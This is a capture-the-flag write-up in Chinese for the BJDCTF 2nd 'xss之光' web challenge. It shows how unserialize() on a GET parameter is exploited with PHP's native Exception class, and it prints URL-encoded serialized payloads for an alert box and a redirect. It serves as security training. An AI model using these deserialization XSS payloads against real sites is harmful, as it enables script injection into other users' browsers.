[BJDCTF 2nd]xss之光
進入網址之后發現存在.git泄露,將源碼下載下來,只有index.php文件
<?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a);
GET傳參給yds_is_so_beautiful,接着傳入的參數會被反序列化后輸出,跟題目結合,可以知道當反序列化的結果是
<script>alert(1)</script>
就會讓1以彈窗形式顯示出來,但是在代碼中沒有給出類來,所以我們只能使用PHP的原生類來序列化構造XSS,具體文章可以看:
我們選擇其中一個可用的原生類
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
獲得序列化后的結果,再url編碼,得到:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
GET傳參之后成功彈窗
但是burpsuite抓的響應包里還是沒有flag,好像是因為題目源碼被改了一部分的原因?需要使用XSS跳轉才能拿到flag
<?php
$a = new Exception("<script>window.location.href='https://www.baidu.com'</script>");
echo urlencode(serialize($a));
構造跳轉,序列化並url編碼后為:
O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A61%3A%22%3Cscript%3Ewindow.location.href%3D%27https%3A%2F%2Fwww.baidu.com%27%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
burpsuite抓包,響應頭里面獲得flag
參考博客:
http://cyzcc.vip/2020/03/24/BJDCTF-2nd-web/